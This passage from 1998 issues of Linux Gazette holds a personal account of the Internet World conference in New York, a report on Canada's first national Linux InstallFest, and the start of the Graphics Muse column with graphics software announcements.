pavilion. So I headed over there.

There I found the Pacific Hi Tech guy, the Caldera guy, the SuSE guys, and the VA guy. I spent some time with each. At that time, the VA guy was in a crisis situation. His PC had arrived broken. It was shaken up during shipping. Evesdropping in on the situation, it sounded like the disk drive was not properly screwed in to its bay and when the VA guy opened up the box, he found the system disk sitting on the bottom of the enclosure. After putting the disk back where it belonged, it wouldn't boot. At that time, there was some guy from RedHat, trying to figure out how to get it back up and running. It was tense. The RedHat guy had a bead of sweat coming down the side of his forehead while he franticly typed commands at the console trying to diagnose the problem. I've been in similar situations but not as bad has having my system dead on the show floor of a major Internet conference. Instead of standing around looking over his shoulder adding to his pressure, I told the guy good luck and took off for lunch. (I stopped by some time later, and the machine was running fine.)

Lunch. Two hotdogs and a soda. All for under $5. Much better. Thank you street vendor. (Hmm... I see parallels here between open and close source development and lunch with the street vendor and at the conference cafeteria.)

After lunch came the Oracle keynote given by the CEO of Oracle, Larry Ellison. The only time I've seen him before was on a very good documentary by this Cringly guy titled something like "The Revenge of the Nerds" which tracked historically the rise of the SV power houses along with MS. The pre Keynote show or add, was really intense. All 5 TV displays were in full swing throwing up graphics and images of Oracle and the Internet. The music was very loud and fast. The adrenaline rush was mounting. After about 5 minutes of this extremely intense pitch, the noise gave way to silence. Then someone from the audience shouted "LOUDER!". Everyone laughed. And out came the CEO of Oracle. I don't know if he caught that, but I would have been rather emberassed. So off he goes ranting and raving about the future of computing. He ragged as much as possible on Microsoft. (There was an article in the NYTimes which talked about NT servers in every Burger King or McDonnalds and he thought that was a bad idea.) He then went to describe the power of the internet and how his product was going to take advantage of it etc etc... Its hard to take so much promotion of someone's software. The one thing that irked me was that he was confusing the internet with the browser. He kept saying things like, "You can access our database on the Internet" and he popped up Netscape and ran through some demo. I have a feeling that either he figures that the regular joe mo user considers the browser as the Internet or he is a regular joe mo user who doesn't know the subtleties of what he was ranting and raving about. In any case, while he was stepping through his demo, which was running on an iMac, the app froze and there was a frantic rebooting of the machine. The Orcale guy was able to talk his way through the rebooting of the poor iMac. This is life at the bleeding edge. Even Larry Ellison as to bleed a little.

After the key note, I turned my attention to a session titled, "Getting the most out of the Mozilla source code." Cool, open source, finally something about the real future. The guy who talked impressed me. He was an African guy who waxed well about web page development. I was glad to see that the field of Internet technology was not completely dominated by males of protestant/european decent. The session that followed was by some guys from real.com (I think the name has changed) who talked about audio and video compression. The topic of the session being multimedia in your browser. The technical stuff they covered was good. I can now claim to be an expert in audio and video compression. I know the jargon words, compress, equalize, encode, decode, key frame, mpeg, and so on and so forth. With that, I can bullshit my way through any multi-media discussion.

I lost patience with the conference sessions and decided to go back to the show floor, Instead of rushing off to the RedHat booth in mere panic, I scouted out the various setups put up by all these forefront companies. The companies who rented real estate from Javits was a who's who of my life blood. HP, Sun, SGI, IBM, Motorola, Cicso, Microsoft, Bell Atlantic, Computer Associates, O'Reilly, Oracle, Sybase, and on and on. The Big players had Big booths and just as in the real world, the real estate proverb of "Location, Location, Location" applies equally well here. All the companies with big bucks were positioned right in front of the several entrances to the main show floor. IBM bought the best spot, they were just behind the main entrance. Microsoft had the second best spot, which was just to the right of IBM. It's hard to describe the impression of some guy who has never seen this kind of presentation before. Its BIG, Its LOUD, its FLASHY, its CATCHY, its MTV, its exhausting. These Fortune 500 booths all had big audio/visual displays advertising their merchandise. All screens were BIG. Those cool Sony TV's where you put 9 or 16 of them together in an NxM array and together they make up one big TV screen were all over the place. IBM must have had 1/2 a dozen of these arrays setup. The detail setup of all these booths has been lost from memory. Some exceptions linger. First, is Motorola's Digital Diner. Forget the elaborate array of video technology (gadgets), Motorola I think out did everyone with their Digital Diner. As I strolled around the floor trying to keep my mind from exploding from information overload, I saw this diner looking structure with a bunch of people standing around rather captivated by what was going on inside. I got a closer look and it took a bit of focusing, (I'm brain is fighting these peak levels of information infusion) and I realized that inside this diner, is a restaurant mockup with a full Broadway cast singing and dancing to the hand full of show attendees who caught a seat at one of the booths inside this Digital Diner. They are sing and dancing to the Tune of IP Telephony no less. The cast was a hoot. They had a cop, some sales guy, and 3 waitresses. And sing and dance they did. From the outside of the booth, you could not hear the music or what they were saying, but the visual of waitresses dancing around with coffee pot and mug in hand, with those head held microphones was just too cool. VIVA New York City! (My guess is that the cast is from Pasadena and they tour the country going from Internet show to ISPCon singing and dancing the IP Telephony tune, but NYC is the center of the Universe for Broadway shows, and seeing this kind of production in Javits was special. At least to me....) Not to be out done, the folks at Computer Associates had their own production going. Their theme was Jazz, and the stage was a funkie bar/cabaret setting. Here they had a couple with the familiar head held mics, dancing around singing about CA solutions for your corporate enterprise. They were supported by another couple with no head mics but just danced around. Again, a type of 50's be-bop as was going on in the Digital Diner. Very entertaining. Trying to compete with this kind of message delivery were other booths of smaller, lesser known (at least to me) companies were Magic shows, guys on unicycle juggling swords. You thought Central Park on a sunny summer afternoon was a zoo, then you haven't been to an Internet show lately.
 


                   


 


While wondering around, I got the both number for the NY LUG named LXNY. Strange acronym for a users group. They were located on the first floor show area way in the back. They could not have been further removed from the action. Ok, local users group, no money, perfectly understood. I introduced myself to the guys, signed up to their mailing lists and hung out for a chat with them. The guy in charge seemed to be a reasonable chap. He tells me he is a perl nut, or something to that effect. Cool, definite open source kind of guy. There was another guy working on an install of SuSE on his laptop. I peered over his shoulder and saw some of the installation pages as they flashed by while he selected this or that to be installed. Looked nice, a bit more polished than RedHat's install. There was another chap who told me how he partitioned his disk, (all wrong according to my rule of partitioning disks, (/, swap and /home and thats it...)) Then there was another guy who sported an old red baseball cap with the RedHat logo on it. Looked rather well worn. He had a scruffy beard, and we talked a bit. He told me that he knows Eric Raymond, the guy who wrote that "The Cathedral and the Bazaar" net-paper, from some Sci-Fi shows. He then goes on to tell me about his political slants. He's a libertarian. He tells me that he and Eric, when not talking about open source, talk about politics and guns. "Guns?" I say. Yes, guns. He then asks me if I believe in the first amendment. "Yes", I say. "Do you own a gun?", he asks. "No", I reply. "Then SHUT UP!", he snorts. Yup, guns and the first amendment go hand in hand. He continues to tell me how the 10 amendments have been eroded by the 'Government'. It's hard for me to carry on a conversation with this guy. Especially when it turns to Y2K and stocking up provisions for the aftermath.

Day 4) Up and at'em at 5:45am. The day turns out to be rather gloomy with rain forecasted. By now, my commuting routine is getting fine tuned. I got to the train station in time to leisurely buy my round trip ticket, coffee and bagel and have 1 minute to hang out on the train platform watching all the other commuters who had equally well tuned commuting skills. Getting to Javits, I go directly to the special events hall to hear the keynote which will start in about 10 minutes. The ambiance is much more subdued. The usual MecklerMedia add stuff on the now more mundane 5 screens rolls on unnoticed. (Its amazing the capacity of the brain to adapt to new levels of sensory filtering.) The speaker was the Chairman/CEO of AT&T, C. Michael Armstrong. What he had to say was rather boring compared to the previous two speakers. He had no gizmo to show off, or web pages to surf too. He basically announced one thing, the intent of AT&T to take over the internet as we know it. Fair enough. He boasted the recent $48e9 acquisition of MCI. He waxed about the quality and quantity of future AT&T cable modem services. In all, he came across as the most fine tuned image projecting CEO that I've met. (The only other CEO being Larry Ellison.) Still, I was rather amazed at the skill of this guy to project the image of Stability, Strength, Leadership. By the end of his speech, I wanted him to my grandfather. (Not for the money mind you.) I recently met NY's senator from Long Island, Al D'Amato. Al is on the opposite end of the spectrum to the CEO of AT&T. When I met Al, the bit which struck me the most was his total arrogance at the people around him and at the same time his attempt to try and look caring. He would crack a forced smile when meeting the audience he was going to speak to. When the cameras were on him, that forced smile would pop back into his mouth, and all the while, we would have this strange glare in his eye, trying to asses every one he shook hands with. Needless to say, he blew me off when I shook his hand. (No forced smile for me.) But he did have lots of smiles for my wife who was also in the hand shaking line. (And a kiss on her cheek to boot!) In contrast, was AT&T's CEO. This man had depth. Being around him gave you a sense of solemn. He was a family man. He set the stage for his speech by telling a joke involving his granddaughter. After he established himself as a caring family man, with his joke, he plunged ahead with talk of how AT&T will be in everyones home delivering those internet services to you via TV. I guess the big difference between Al and this CEO is the amount of money they truly control. Al controls his campaign funds. He really has little control over the US government budget. In contrast, the CEO controls BILLIONS and is payed mucho more for it than Al gets for voting in the US senate. So, the law of capitalism dictates. You get the Al D'Amatos to run the country and the C. Michael Armstrong's to rule the world!

After the keynote, I decided to take a break from the show floor and the TCP/IP sessions I came to attend, to listen to a discussion on the 'Adult Entertainment Industry' put on by the "Investing in the Internet" session. The session was well attended and the speakers were an interesting and diverse bunch in themselves. They had what I think was a technology consultant for Penthouse. They had some guy who recently wrote an article for Upside Magazine on the subject. Upside was sponsoring the session. They had a woman who owned her own adult Web site. And there was a guy from a research type firm who was trying to figure out how much money was being spent on adult web sites. The consulting guy for Penthouse when first. He groaned about the lack of payment for services rendered on these web sites. The researcher gave a short talk on how hard it was to figure out how much money was going into the Internet adult business. His conservative estimates, and believe me, from what he said are very conservative, is that close to $700,000,000 this year will be spent on guys looking a nude girls doing weird things to themselves and others. This is conservative. (i.e. looking at the volume of charges of 5 or so popular adult web sites.) Then the woman, owner of her own adult portal, raved about the wonders of the business. Its recession proof, it makes MONEY, (she broke even in 6 months, but she didn't say how much was invested up front), there are plenty of models waiting to get into the business. Its safe and virtual. And she thanked Bill Clinton for bring erotica into the main stream. She claims to have lots of brunets posing with cigars. One thing which annoyed me was this video camera which was filming this session. They had the audacity of panning the audience. I had to keep hiding behind the guy between me and the camera to make sure I would be seen on National TV watching this adult forum and then trying to explain to my boss why he should pay $1.4K for my registration fee. I know, its hypocrisy on my part, but that's just the way I am. So between dodging the camera pan of the audience and listening to panel mourn the difficulties of IPOing firms engaged in adult content I got out of the session with this urge to run off and make a billion in porn. Of course I'm not going to do so, but the guy sitting next to me will.

After my short diversion into the underworld of the Internet, I headed back out to the show floor. I had in mind lining up to get into the Digital Diner and perhaps get one of those Motorola burgers they were serving up. (I do a lot of work with Motorola embedded real time systems, so that Motorola burger would have been a cool fixture on top of my 21'' monitor.) But first I wanted to stop by the SuSE stand to see if I could get a copy of their distribution. I had picked up Caldera's and Pacific HiTechs. Nope SuSE was still out and my guess is that they ran out on the first day and the talk of getting more SuSE CD's for distribution today was just hype. There was a lot of action around the Oracle partners pavilion where the minor Linux distributors were being hosted. So I stuck around. I've heard a lot of KDE and SuSE packages it with their distribution, so I was checking out what the SuSE guy was demonstrating. After a bit I got engaged with the SuSE guy. He introduced himself as Todd Andersen, the guy who claims credit for getting the term Open Source accepted as the new term to replace free software. What a character. His background is with the Department of Defense. He rattled on for about 30 minutes about the spooks in the CIA, how the NSA was a serious organization and other ongings of our defense industry which I was trying to grapple with. I'm not sure how Todd got into the Linux business coming from the Defense Department, I missed that part of his introduction. Being a fair minded guy, and the fact that I'm rather in the RedHat camp, I thought I would offer to mirror their site. I'm currently mirroring RedHat's and spent $1K of the governments money in doing so. (You need a large disk.) The disk is not totally full and being that SuSE is making inroads into the Linux mainstream, I thought it appropriate that I also mirror this site. Todd and Bodo, (Bodo is the guy with green hair as described by Dan Shaffer on CNET radio's "Project Heresy" broadcast of Thursday Oct 8, who came from Germany to help out their US SuSE brethren.) got all excited about this, after telling them that the lab I work for has a T3 connection to the internet. I then proceeded to show Todd my Linux resources web page I've put up for people at Brookhaven National Lab, or around the world as that goes, to get some advice on how to get Linux installed on their machines. Todd was loosing interest in my web page due to other show attendees coming around to checkout their very nice KDE desktop setup. I bade them firewall and took off to checkout how the RedHat booth was doing. Over at RedHat, they were fielding many questions from a hand full of people. RedHat was going to get another shipment of CD's which they were going to start giving out at 2pm. I hung around with Melissa and some other chap who used to work for Los Alamos National Laboratory who got RIF'ed and is now playing a role in this leading edge company. He made the right move. He was also the guy who rescued the VA Research machine which arrived in a sorry state at the show. One side note I would like to mention is they guy from Adaptec who I met. As I was hanging around the RedHat booth, I heard some guy say he is from Adaptec. This caught my attention. To me, Adaptec is the premier provider of SCSI controllers for the PC/PCI market. Most motherboards you get these days have a built in Adaptec SCSI controller chip giving you an on board SCSI port, much like the on board IDE channel all motherboards today provide. With all the experience I've had installing Linux boxes, I've always run into the Adaptec kunumbdrum. Great hardware, but bad driver. I've had several instances where spanking new 23 Gig Seagate drives were attempted on a SCSI bus hosted by an Adaptec controller which failed miserably to integrate. My solution, forget the Adaptec built in Ultra Fast SCSI controller and spend $300 on a Buslogic SCSI controller. A sure win. Great SCSI hardware and an even greater driver to go with it. When I put my first Linux box together, I pondered the SCSI question. What controller. After poking around in the SCSI howto, I found that Leonard Zubkoff got direct support from Myplex to help write the driver, the decision to buy the Buslogic card was done. And true to the open source/Internet development environment, it was never more than 24 hours before Leonard would send me a patch to his driver when things went wrong. (At one point I had one differential card and one single ended card installed in my quad Pentinum pro box and things didn't boot right, and Leonard fix that problem quick.) So, back to Adaptec. Not too long ago I read a bit of news from the RedHat web page that Adaptec was going to embrace the Linux community, which meant that it was going to release the full hardware specs to the driver writers. Voila, I would finally count on being able to use all those on board SCSI controllers which I've had to ignore. But since ever since I read this great announcement, I have not been aware of any new Adaptec driver updates, so as far as I know. So, I gave this guy from Adaptec a my long story I just dump on you and he replied with some interesting inside info. First of all, we was not with the SCSI development team. This guy was a sys admin for Adaptec. But he did tell me that Adaptec has been going through some hard times. With its success in the SCSI market, Adaptec decided to diversify into a whole bunch of other high tech field, none of which they turned out to be any good at. He told me that the Adaptec stock peaked at $50 something a share and now was down around $5 or so. This has forced Adaptec to go back and concentrate on its core business. Along with that, he tells me that Linux is really big inside the company. He tells me that there are a lot of Linux peraphenalia, and he picked up the RedHat bumper sticker which lay in front of us and pretended to tack it on to an office cubical wall. "You see a lot of things like this, around the company", he said. Just like the rest of us, the Adaptec employees saw the light in Linux and my guess is that Adaptec's announcement to support the Linux effort came from a movement within the company. From the employee's themselves. I found that insiders view of Adaptec to be rather interesting.

Melissa told me that the RedHat CD handout was going to occurs at 2pm, being around 1:15 pm, I decide to go get lunch and then head for the afternoon keynote. It was raining rather hard so the hotdog stand was out and I had to spend lots of money on a rather simple barbecue sandwich in the overdone Javits cafeteria. From there it was on to the special events center where I waited for about 20 minutes for Jim Barksdale, the Netscape cheefo to give his view of the Internet world. I thought I was in for a surprise when the music which preceded the talk was a cool jazz piece. This is good, no need for super hyped up rock sounds beating your adrenaline system into hyper drive a-la Oracle. The problem was, as I found out within a few minutes into Jim's speech, he was a total bore. He lacked everything. No charisma, no attitude, no inner-drive, nothing. This guy reminded me of mashed potatoes. Netscape, as far as I'm concerned, is the only browser one should use. Maybe if there was a Linux port of IE, I would try it, but without that, there is nothing else which is graphically based. So, here he is, talking about The browser but has no charisma to put the punch into his presentation. I, along with the rest of the audience, was losing my attention for what ever message he had to deliver. The selling point of Netscape was the ability to type a key word into the URL field and the browser would 'find' the page you were looking for, and the 'what's related' button next to the URL field. He spent some time, too much time, plugging this feature. He then talked wonders of the customizability of the browser, either for ones own personalification or to setup some 'portle' for some company too lazy to higher a good webmaster with the proper Java skills to do the job right. At the end of his keynote, James took off without giving the change of the audience to approach him afterwards for a question or two and/or to exchange business cards. Another flop move. So be it for Jim. Although I could hardly sleep the night I found out that Netscape was going to release the source code via their Mozilla.org site. Jim hooked his wagon to the right company at the right time, nothing more. He talked about running Federal Express before running Netscape. Somehow I can't see the connection between the two companies except that there is something which went wrong here. Steve Jobs and Bill Gates grew up with the field, Jim Barkesdale seems to have dropped in like an uninvited guest. I guess its much the same as the guy Steve Jobs hired to run Apple who eventually dump Steve from Apple. Us technophites need to learn some lessons here.

After being let down by the Netscape keynote, I rushed back up to the RedHat booth to see how the CD handout was going. It was going well. There was a line of about 20 to 30 people long waiting to get a RedHat CD. I took the opportunity to take some pictures of the line of Linux users to be. With that, I wished the RedHat team good luck in there endeavors and took off to my last session, "Migrating to IP version 6." This session was given by two IBM consultants out of North Carolina. My first tag team seminar with that same tele-evangelist delivery. IPv6, Amen!
 



 


I was expecting the session to go until 5:30 but ended an hour earlier. I was planing to then roam around the show floor a bit more looking to see if there were any after hour networking parties to go to. But somehow, after getting to the main entrance plaza of Javits, with the rain coming down, and not having much of a stomach for more Internet World show biz, I canned my plans and made a bee line to Pen Station to catch the 5:22 train back to Long Island. Once on the train, I had an hour and a half to ponder my last 4 days. I've only been to scientific conferences. The last one, Computing in High Energy Physics, I found to be rather tedious and left after two days. (I had a good excuse, the DAQ system for the experiment I'm on was acting up and they needed their expert back in house. Although I could have, and did, solve all their problems by walking the clueless over the phone, through the various button clicks to get back into full data taking mode.) After I put Linux on my first home grown PC, 3 months after getting my Ph.D., my life has been so tied up with this OS that I've often pondered why I continue working at a High Energy Physics Lab. I've done my best to aid Linux gain inroads into the high energy and nuclear physics community by porting a lot of Fortran code to Linux. I've also leveraged my position at the lab to put together the first official group of Intel PC's running Linux for the scientists to analyze their data. Being in the DAQ subfield of physics give you a high point from which to watch how the technology used to bring the Internet to life evolve through time. My work has been all internet, Unix workstations, data over IP, (Gigabytes of Data and now going on to Tera bytes), routers, switches, e-mail, html, java, X11 and on and on since I first learned how to program a computer back in my first physics lab when I was 18. Walking around the show floor, and going to the sessions brought my whole world around. Internet world is really my world. I knew in depth or otherwise, every aspect of what was being presented at that show. And with the Linux people there, this added gravy to show. It was some 4 days. Friday I'll be back to helping BNL users find their way through the Unix/Internet maze of the lab. Monday I'll be back worrying about why I can't sustain 20Mbytes/sec data throughput in our DAQ, or rather why the clueless users seem to stumble all over my DAQ system. But for now, on my ride home, I just let all those memories of Internet World swirl around my head, as I looked out the LIRR train watching Long Island sweep by.
 


Copyright © 1998, Stephen Adler
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


First Canadian National Linux InstallFest

By


Photo Album


Saturday, September 26, 1998 was a big day for the Linux community in Canada--that day the First Canadian National Linux InstallFest was held.

The InstallFest was organized on a national level by CLUE (Canadian Linux Users' Exchange) to provide interested people with experienced help installing Linux on their computers. CLUE is an organization that supports the development of local Linux Users Groups, and co-ordinates events, corporate sponsorships and publicity at a national level. CLUE hopes that by enhancing association and communication amongst its developers, users, suppliers and the general public, it can increase the use and appreciation of Linux within Canada.

Highlights

A dozen different events were held across Canada, from Halifax to Victoria, all taking place on the same day by Linux User Groups.

The Montreal event, at its peak, had as many as 100 people in the room at once and by all accounts, had 200 to 250 people stop by. They did 40 installs, only 20 of which were from preregistrations. They even had the crew of the local TV show Branch stop by for an interview, due to air in November. Also worthy of mentioning, they had guru Jacques Gelinas, the author of the LinuxConf software, answering questions.

Two InstallFests were held in the Toronto area: one at Seneca College and the other at the University of Toronto Bookstore. The Seneca College event had a late start due to a power outage, but more than made up for it as the unofficial count of installs is about 100. They even rolled out their Beowulf class Linux cluster for the masses to look at and see how a few ``small'' Linux boxes can be turned into a Supercomputer.

The Manitoba UNIX Users Group, (MUUG) held their InstallFest at the University of Manitoba, as two-day event beginning on Friday. As this was their first InstallFest, they deliberately kept it small and aimed mostly at the faculty and students of the U of M. About 140 people attended, with more than half purchasing a Linux CD, as well as 19 successful installs. Attendance was greater than expected, probably due to the national news coverage the event received. At least one person came in who said he had discovered the InstallFest by seeing a segment about it on CTV News-1, a National News network.

The MUUG web site made mention of one more interesting story from the event. One attendee brought in a system which became known as ``Franken-puter''! It was apparently two separate cases tossed together with all sorts of spare parts the owner was able to scrounge up, and connected with a piece of coax Ethernet cable. He spent as much time swapping parts and reconfiguring on the fly as he did installing Linux. He apparently showed up at the start of the event on Friday and didn't finish until mid-afternoon on Saturday. Even after all that, he still hung around afterwards to help others with their installs.

The Ottawa InstallFest was hosted by the Ottawa Carleton Linux Users Group (OCLUG). While almost all the other events were held in a more academic setting of local colleges and universities, OCLUG had their event sponsored by NovoClub, a local retail store. NovoClub is located in a shopping mall and managed to get an empty store front for OCLUG to use. They also arranged for display kiosks to be set-up in the mall by several companies. There were training companies, a local ISP and most notable, Corel Computer displaying their NetWinder, and of course, NovoClub was offering specials on their very large selection of Linux products. The whole event was more like a mini trade show than a typical InstallFest.

The unofficial count at the installation store front was that 250 people came through the door. This count included those that came to have Linux installed on their machines, members of the press and ``just curious'' folk who stopped to ask questions, while wandering around in the mall.

OCLUG chose not to have people preregister, they decided to just let people come and register the day of the event. It was supposed to start at 10 AM and go to 5 PM. However, people were lined up at 9 AM when the mall opened, and they soon ended up with a backlog of machines waiting for Linux installation. By 3 PM they were two hours behind and had to start turning people away. By the time it was over, they had installed Linux on 50 to 60 machines and still had 10 they could not finish.

Not all events were as big as the ones listed above. The New Brunswick Linux Users Group had only ten people attend, with four successful installs. They were a bit upset at the low turn out. However, it was also Homecoming week at Mount Alison University in town, and a football game was in full swing at the same time as the InstallFest. They are in the process of designing a tutorial for their new users and anyone else who is interested. The Fredericton InstallFest was a little larger with thirty attendees and ten installations.

Overview

The general consensus is that as a public relations event, the InstallFest was an overwhelming success. It got a lot of people asking questions about Linux, some of whom took the plunge and installed Linux for the first time. However, it was not completely successful as a technical event. By no means is this a reflection on either those who organized the individual events or the volunteers who helped with the installations--they all did a stellar job--just no one was prepared for the magnitude of the response.

Most LUGs asked people to register prior to the event. This allowed them to get as many volunteers as they thought they would need. Some groups, like the Vancouver Linux Users Group were swamped with preregistration and had to halt registration prior to the event because they could not accommodate everyone. Even with preregistration, the day of the event was hectic. The report from Seneca College in Toronto was that their event lasted until 9 PM, and they were still unable to complete all the installs. Other events had similar reports, and despite the best laid plans, the response overwhelmed the number of installers.

Some installs were unsuccessful, either due to time constraints or hardware compatibility issues that were not easily overcome. That said, the ratio of unsuccessful to successful installs was minimal. In most cases, it was one or two to fifty. I've seen more failures on MS Windows installations than that.

Where Do We Go From Here?

One of the interesting side-effects of the OCLUG InstallFest was that preliminary discussions were started between Zenith Learning Technologies and Corel Computer to set up a corporate Linux training program. Also, Oliver Bendzsa of Corel Computer reportedly said that he was as busy at the InstallFest as he was at Canada Comdex, a 3-day trade show that drew some 50,000 people in Toronto.

Dave Neill, a founding member of OCLUG, said that while grassroots events like the InstallFest are a great way to promote Linux, it is now time to start approaching local computer resellers and show them there is a demand for systems with Linux pre-installed. I work for Inly Systems, the largest independent computer reseller in the Ottawa area, and while we are now expanding the variety of Linux products we carry, we still do not offer Linux pre-installed on our machines. However, with at least three technicians who have experience with Linux and/or UNIX installations, we could do this if people began asking for it. However, we are an exception; most resellers don't have technicians with Linux experience.

One of the issues that must be answered is how and where companies can have their technicians trained. This is where training companies like Zenith Learning Technologies come in. The fact that Zenith was at the OCLUG InstallFest shows that they realize the potential for Linux training. With such companies as Corel, Oracle, Intel and Netscape investing time and money in Linux, it won't be long before other training companies jump on the bandwagon.

Today Canada, Tomorrow the World!

Plans are already in the works for a Global Linux InstallFest next year. If you would like to know more or would like to get your LUG involved, please check out the CLUE web site at http://www.linux.ca/ and contact Matthew Rice. An event of this magnitude will need lots of help organizing, so don't be shy--watch out Bill, the Penguin is on the move!

For more information on the individual InstallFest events, please visit the CLUE web site for a list of links to all the participating user groups.


Copyright © 1998, Dean Staff
Published in Issue 33 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"



muse:
  1. v; to become absorbed in thought 
  2. n; [ fr. Any of the nine sister goddesses of learning and the arts in Greek Mythology ]: a source of inspiration
© 1998 by

Button Bar
Welcome to the Graphics Muse! Why a "muse"? Well, except for the sisters aspect, the above definitions are pretty much the way I'd describe my own interest in computer graphics: it keeps me deep in thought and it is a daily source of inspiration. 

[Graphics Mews][WebWonderings][Musings][Resources]

This column is dedicated to the use, creation, distribution, and discussion of computer graphics tools for Linux systems.

This month marks the second anniversary for the Graphics Muse column.  Its hard for me to believe I've been doing this for that long.  My general span of attention is about a year, but I've managed to not only hold onto an interest in this column, I've managed to grow it into several articles and covers for the Linux Journal, a book, and a web site devoted to computer graphics and based on this column.  I guess when you get on a roll, stick with it.

The more observant readers will also notice a little change in format for this column.  I finally did a little color matching for the various images I use and, at the bequest of more than just a few readers, got rid of the multicolumn articles.  Most of the announcements are on a page of their own now, although I will be keeping a few on the first page.  Overall, I much prefer this new format.  It just looks cleaner.  I hope you like the changes.

In this months column I've taken a chance and offered a little editorial on the way things are as I see them.  Much of what I've seen in the past few months revolving around Linux has been positive news - announced support from all 5 major database vendors (Oracle, IBM, CA, Sybase, and Informix), Intel and Netscape announcing investment in Red Hat, and lots of generally good press.  But along with this I've seen a fair amount of disunity among the community.  There are camps forming between followers of various leaders.  I find this sad.  Hardlines drawn by groups with disparate interests and ideas tends to drain the energies of both sides of the argument and I'd really hate to see that happen with Linux.  The worst aspect of these arguments is the distraction thats created from the real focus - proving how Open Source/free software can really be viable solutions to end users, not just developers.  Thats key to making Linux a world player in corporations, education, government and on the desktop.

In this months column you'll find:



Other Announcements:
Blender Manual
Moxy 0.1.2
Quick Image Viewer 0.9.1
GQview 0.4.3
FLTK 19981006
XawTV 2.28
jmk-x11-fonts 1.2
KIllustrator
MathMap
Metro-X 4.3
GNU PlotUtils 2.1.6
Simple DirectMedia Layer Version 0.8
tkscanfax
MAM/VRS
Xi Graphics Announcements
< More Mews >
Disclaimer: Before I get too far into this I should note that any of the news items I post in this section are just that - news. Either I happened to run across them via some mailing list I was on, via some Usenet newsgroup, or via email from someone. I'm not necessarily endorsing these products (some of which may be commercial), I'm just letting you know I'd heard about them in the past month.

S.u.S.E announces support for Matrox Cards
Dirk Hondel has put a new version of XFCom_Matrox on the ftp site and updated the web site at http://www.suse.de/XSuSE/XSuSE_E.html.
The new server should work on all current Matrox boards, including the
  • Matrox Millennium G200 (SGRAM and SDRAM)
  • Matrox Mystique G200
  • Matrox Productiva G100
The server is well accelerated and supports 8/16/24/32bpp on all of these cards.
Please report any problems with these servers to


Meteor 1.5.2 - Matrox Meteor video capture board driver/utilities
is pleased to announce the release of "meteor-1.5.2", a driver and collection of applications for the Matrox Meteor frame grabber.  This driver runs on the Linux 2.0.xx series of kernels. Its earlier counterpart, version 1.5.1, has been reported to work on many 2.1.xx releases and later 1.3.xx kernels.  This version should work on those kernels also.

The Matrox Meteor is a high end professional quality video capture board commonly used in demanding video capture applications such as laboratory research, robotics, and industrial inspection.  It's video quality and clarity of it's captures are generally notably superior to the garden variety consumer grade image capture devices, and it's price reflects this.

This driver is bundled with single frame capture software, software for displaying real time video in a window, patches to make the meteor work with "vic", a Linux video conferencing package, and other goodies.  The "official page" for this package is found at http://www.rwii.com/linux/.  Other information about this driver can be found at http://www.cs.virginia.edu/~bah6f/matrox/.

Like the numbering scheme for the Linux kernel itself, the odd middle numeral in the version number ("5") indicates that this is a "development" release.  It however contains numerous enhancements over the last "stable" release, not the least of which are the ability to compile without hacking on the latest development and stable linux kernel versions, as well as the ability to compile and run properly on libc6 based distributions.  In actuality, this "development" version should prove to be pretty much as stable as the last "stable" release.



Crystal Space 3D engine Has Moved
would like to announce a knew homepage for the Crystal Space 3D engine. He develops Crystal Space mainly on Linux but it is also ported to other platforms (like Windows, DOS, Macintosh, OS/2, Amiga, ...)

The URL is http://crystal.linuxgames.com

Crystal Space is a free (LGPL) 3D engine written in C++. It supports colored lights, mipmapping, mirrors, reflecting surfaces, 3D models/sprites, scripting, and other features.  The purpose is to make a free and flexible 3D/game engine.  Crystal Space is also a rather large open source project. There are currently about 182 people subscribed to the developers mailing list. You can join to!



Casio QV-10 digital camera HOWTO
Bob Hepple has re-posted the HOWTO for using the Casio QV-10 digital camera with Linux (published in Linux Gazette) at:
http://www.bit.net.au/~bhepple/qvplay/qvplay.html

Bob Hepple
mailto:
http://www.finder.com.au



Casio QV digital camera support for the GIMP
is pleased to announce a new plug-in for the GIMP. It called 'cam' and allows the GIMP to read CAM files directly. Those files are the ones stored in Casio QV-* digital cameras and that you can dump using, for instance, QVplay.
URL: http://www.mygale.org/~jbn/qv.html


DC20Pack - software for Kodak DC20/25 cameras

DC20Pack is a Software Package for Kodak DC20 and DC25 digital cameras which contains two programs: dc20term and dc2totga.  dc20term transfers the pictures out of the camera and stores they as raw data files.  dc2totga converts those raw data files to standard image files using the popular TGA image file format.
URLs:
ftp://sunsite.unc.edu/pub/Linux/apps/graphics/capture/dc20pack-1.0.tgz
http://home.t-online.de/home/Oliver.Hartmann



GIMP wins Productivity Software award from APC Magazine

The following note was posted to the GIMP Developers mailing list on October 19th, 1998:

I'm writing from Australian Personal Computer magazine and would like to congratulate your having won an Award at our annual IT Awards evening last Thursday.

We have a beautiful crystal trophy we would like to send you having won in the Productivity Software of 1998 category.  Please can you forward me your street address and phone number as I would like to send this by courier to you.

Regards
Helen Duncan
New Media Projects Manager
Australian Personal Computer

The official award announcement can be found at http://newswire.com.au/9810/award.htm.

The award is being shipped to Peter Mattis who will be placing the trophy in the lobby of the XCF (Experimental Computing Facility) at Berkeley, which is where the GIMP has its origins.  Congratulations to all those involved in the evolution of the GIMP!


Did You Know?

...For those of you who don't read GIMP News, has added a couple new tutorials to http://www.xach.com/gimp/tutorials/.

...at a refresh rate of 60Hz or lower, you'll often detect an eyestrain-causing flicker on your screen. Flicker generally disappears at 72Hz; the Video Electronics Standards Association's (VESA's) recommended minimum for comfortable viewing is 75Hz. Whichever card you buy, in any price range, be sure that it and your monitor can synchronize to provide at least a 75Hz refresh rate at your highest preferred resolution and color depth.

From ComputerShopper.com's article "Performance on Display"
...a poll is being run by lumis.com asking which platform you'd like to see Alias/Wavefront's Maya 3D product ported to.  Go there and tell the world - we want graphics tools ported to Linux!  Slashdot had reported this link and noted that MacOS was way out in front, but the Slashdot effect &tm; had already taken by the time I got there and Linux was in front once again.

...you can find collections of free fonts all over the Internet.  Take a look at the following sites:

http://www.fountain.nu/fonts/free.html - TrueType only (PC format downloads is in small type)
http://www.signalgrau.com/eyesaw/html/main.htm - TrueType and Postscript Type 1 fonts (pfb)
http://www.rotodesign.com/fonts/fonts.html - Type 1, but sans most punctuation and some numbers
